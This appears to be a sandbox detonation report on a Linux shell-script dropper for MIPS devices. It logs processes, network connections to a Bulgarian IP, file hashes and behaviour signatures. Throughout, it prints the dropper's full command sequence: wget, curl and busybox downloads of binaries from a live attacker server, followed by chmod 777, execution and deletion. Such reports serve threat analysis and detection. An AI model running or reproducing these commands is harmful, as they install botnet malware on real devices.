[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-21 01:28

Reported

2024-10-21 01:30

Platform

debian9-mipsel-20240729-en

Max time kernel

95s

Max time network

97s

Command Line

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW N/A
N/A /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq N/A
N/A /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh N/A
N/A /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 N/A
N/A /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P N/A
N/A /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT N/A
N/A /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR N/A
N/A /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t N/A
N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK N/A
N/A /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt N/A
N/A /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw N/A
N/A /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ N/A
N/A /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/rm N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG N/A
N/A N/A /bin/rm N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /usr/bin/curl N/A
File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /usr/bin/curl N/A
File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A
File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /usr/bin/curl N/A
File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /usr/bin/curl N/A
File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /usr/bin/curl N/A
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /usr/bin/curl N/A
File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /usr/bin/curl N/A
File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /usr/bin/curl N/A
File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /usr/bin/curl N/A

Processes

/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh

[/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/chmod

[chmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt

[./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/bin/rm

[rm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt]

/usr/bin/wget

[wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/chmod

[chmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw

[./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/bin/rm

[rm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw]

/usr/bin/wget

[wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/chmod

[chmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ

[./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/bin/rm

[rm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ]

/usr/bin/wget

[wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/chmod

[chmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q

[./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/bin/rm

[rm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q]

/usr/bin/wget

[wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/chmod

[chmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG

[./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/bin/rm

[rm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG]

/usr/bin/wget

[wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/chmod

[chmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK

[./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/bin/rm

[rm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/chmod

[chmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW

[./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/bin/rm

[rm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/wget

[wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/chmod

[chmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq

[./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/bin/rm

[rm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq]

/usr/bin/wget

[wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/chmod

[chmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh

[./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/bin/rm

[rm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/chmod

[chmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4

[./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/bin/rm

[rm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4]

/usr/bin/wget

[wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/chmod

[chmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P

[./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/bin/rm

[rm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P]

/usr/bin/wget

[wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/chmod

[chmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT

[./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/bin/rm

[rm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT]

/usr/bin/wget

[wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/chmod

[chmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR

[./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/bin/rm

[rm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR]

/usr/bin/wget

[wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/chmod

[chmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t

[./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/bin/rm

[rm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t]

/usr/bin/wget

[wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW]

/usr/bin/curl

